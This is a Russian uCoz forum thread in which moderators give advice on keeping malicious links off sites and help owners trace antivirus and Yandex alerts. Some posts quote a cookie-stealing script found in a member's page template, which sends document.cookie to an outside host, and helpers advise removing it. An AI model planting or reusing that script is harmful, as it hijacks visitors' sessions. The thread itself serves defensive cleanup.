Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    admin6631
    Сообщений: 9
    Репутация: 0

    Сообщение # 1246 | 17:59:24
    Спасибо огромное за оперативный ответ, сейчас попробуем разобраться.

    Добавлено (08 Апр 2014, 17:59:24)
    ---------------------------------------------

    Цитата webanet ()
    <script src="http://delaisait.ucoz.ru/js/jQuery/mobilyslider.js" type="text/javascript">1перелить на сайт
    можно поподробней, пожалуйта
    zarifajapon
    Сообщений: 26
    Репутация: 1

    Сообщение # 1247 | 13:35:29
    не смогла найти своё сообщение в этой теме, поэтому пишу снова:

    На моём сайте http://itachi-uchiha.my1.ru антивирус avast обнаружил вирус
    http://mypageresults.com/?dn=gamesmir.com&flrdr=yes&nxte=gif
    Я не смогла найти этот вирус на своём сайте, помогите пожалуйста найти и удалить вирус.
    извините за плохое качество фото (с телефона).
    ссылка на страницу антивируса (при обнаружении вируса) : http://www.avast.ru/lp-fr-v...._prc=C: \Program%20Files\Opera\20.0.1387.91\opera.exe&p_obj=h_mypageresults_com__?dn=gamesmir_com&flrdr=yes&nxte=gif&p_var=.%2Ffa%2Fru-ru%2Fvirus-alert-default&p_elm=7&p_lex=84&p_lid=ru-ru&p_lng=ru&p_lqa=0&p_lqe=0&p_lst=0&p_lsu=24&p_pro=0&p_bld=empty&p_vep=9&p_ves=0&p_vbd=2016&p_hid=edbc3741-eda3-42ec-a32a-650b9547976c&p_ram=2812&p_cpu=-1%2C0
    Прикрепления: 8104251.jpg (65.7 Kb)
    Сообщение отредактировал zarifajapon - Среда, 09 Апр 2014, 13:49:29
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1248 | 13:46:18
    zarifajapon, напишите буквами, если не умеете делать скрины, что во второй строчке блокировки аваста

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    zarifajapon
    Сообщений: 26
    Репутация: 1

    Сообщение # 1249 | 13:50:15
    webanet, cделала. а кто мне поможет с проблемой вируса?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1250 | 13:55:02
    zarifajapon, что сделала? мне нужен текст второй строчки окошка блокировки аваста
    и ещё. аваст ругается на все страницы или на определенную?

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1251 | 14:17:21
    ПО ПРОБЛЕМЕ БЛОКИРОВКИ САЙТА ЯНДЕКСОМ ПИШИТЕ В ЭТУ ТЕМУ!!! //forum.ucoz.ru/forum/45-62018-1

    все сообщения перенесены в ту же тему //forum.ucoz.ru/forum/45-62018-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    zarifajapon
    Сообщений: 26
    Репутация: 1

    Сообщение # 1252 | 14:43:33
    webanet, http://mypageresults.com/?dn=gemesmir.com&flrdr=yes&nxte=gif
    аваст ругается только на главную страницу http://itachi-uchiha.my1.ru (и при добавлении кодов html (новостей) на этой странице)
    фото окошка аваст прикреплено к этому сообщению
    http://itachi-uchiha.my1.ru
    Прикрепления: 4738259.jpg (231.9 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1253 | 15:01:35
    zarifajapon, попробуйте удалить из вида материалов скрипт

    Код
    <script>img = new Image(); img.src = "http://sharki.ax3.net/s.gif?"+document.cookie;</script>
    и отпишитесь о результатах. в любом случае его там не должно быть

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    zarifajapon
    Сообщений: 26
    Репутация: 1

    Сообщение # 1254 | 15:16:14
    webanet, удалила, но не помогло
    <table border="0" cellpadding="0" cellspacing="0" width="100%" class="eBlock"><tr><td style="padding:3px;">
    <?if($MODER_PANEL$)?><div style="float:right">$MODER_PANEL$</div><?endif?>
    <div class="eTitle" style="text-align:left;"><a href="$ENTRY_URL$">$TITLE$</a></div>
    <?if($MESSAGE$)?><div class="eMessage" style="text-align:left;clear:both;padding-top:2px;padding-bottom:2px;">$MESSAGE$</div><?endif?>
    <?if($ATTACHMENTS$)?><div class="eAttach">Прикрепления: $ATTACHMENTS$</div><?endif?><div class="eDetails" style="clear:both;">
    <?if($RATING$)?><div style="float:right"><?$RSTARS$('12','/.s/img/stars/3/12.png','0','float')?></div><?endif?>
    <?if($CATEGORY_NAME$)?>Категория: <a href="$CATEGORY_URL$">$CATEGORY_NAME$</a> |<?endif?>
    Просмотров: $READS$ |
    <?if($USERNAME$)?>Добавил: <a href="$PROFILE_URL$">$USERNAME$</a> |<?endif?>
    Дата: <span title="$TIME$">$DATE$</span>
    (тут был)
    <?if($COMMENTS_URL$)?>| <a href="$COMMENTS_URL$">Комментарии ($COMMENTS_NUM$)</a><?endif?>
    </div></td></tr></table><br />
    zarifajapon
    Сообщений: 26
    Репутация: 1

    Сообщение # 1255 | 17:20:23
    Perizat, ПО ПРОБЛЕМЕ БЛОКИРОВКИ САЙТА ЯНДЕКСОМ ПИШИТЕ В ЭТУ ТЕМУ!!! //forum.ucoz.ru/forum/45-62018-1
    //forum.ucoz.ru/forum/45-62018-1
    na3bka
    Сообщений: 7
    Репутация: 0
    Уровень замечаний:

    Сообщение # 1256 | 17:46:28
    Помогите с поиском вредоносного кода. Никаких скриптов в последнее время не добавлял, да и не какой активности практически не принимал. Но вдруг Яндекс начал писать, что сайт подозрительный и Dr.Web тоже.

    1) На форуме: http://www.nk-cs.ru/forum/9-20-1 , На главной: http://www.nk-cs.ru/

    2) Под логином и под гостем

    3) Dr.Web

    Цитата
    "Object","Threat","Action","Path",""
    "adj?ref=&tz=-420&fl=12&pos=btf&w=468&h=60&s=95262","SCRIPT.Virus","Заблокирован","http://ads.betweendigital.com/adj?ref=&tz=-420&fl=12&pos=btf&w=468&h=60&s=95262"


    4) Yandex Browser

    Цитата
    Сайт www.nk-cs.ru
    может угрожать безопасности вашего компьютера.

    По нашим данным, на страницах сайта был размещён вредоносный программный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.

    Пожалуйста, прошу помощи. Уже весь код перерыл, не знаю что делать уже.
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1257 | 19:13:30
    na3bka, сайт www.nk-cs.ru не заражён, либо подробности заражения ещё не опубликованы

    Если вы вебмастер сайта www.nk-cs.ru, прежде всего убедитесь, что на сайте действительно был обнаружен вредоносный код. Для этого Вам необходимо зарегистрироваться в сервисе Яндекс.Вебмастер (или авторизоваться, если Вы уже в нем зарегистрированы) и посмотреть вкладку «Безопасность».
    http://yandex.ru/infected?url=www.nk-cs.ru
    zarifajapon
    Сообщений: 26
    Репутация: 1

    Сообщение # 1258 | 19:39:52
    $Vladimir$, помоги найти и удалить вирус с сайта itachi-uchiha.my1.ru
    мне посоветовали убрать из вида материалов скрипт: <script>img = new Image(); img.src = "http://sharki.ax3.net/s.gif?"+document.cookie;</script> Я УБРАЛА, НО ВИРУС ОСТАЛСЯ.
    сайт (и страница с вирусом): itachi-uchiha.my1.ru
    обнаружил аваст:
    Прикрепления: 5898371.jpg (231.9 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1259 | 19:55:56
    zarifajapon, аваст реагирует только на ваш сайт или на других, посещаемых вами тоже стал выдавать url:mal?
    пробуйте зайти на главную сайта другими браузерами. будет ли аваст с другими браузерами выдавать предупреждение.

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    zarifajapon
    Сообщений: 26
    Репутация: 1

    Сообщение # 1260 | 20:29:38
    webanet, только этот мой сайт itachi-uchiha.my1.ru На другом моём сайте всё нормально. (на всех сайтах нормально)
    Сообщение отредактировал zarifajapon - Среда, 09 Апр 2014, 20:31:16
    Поиск: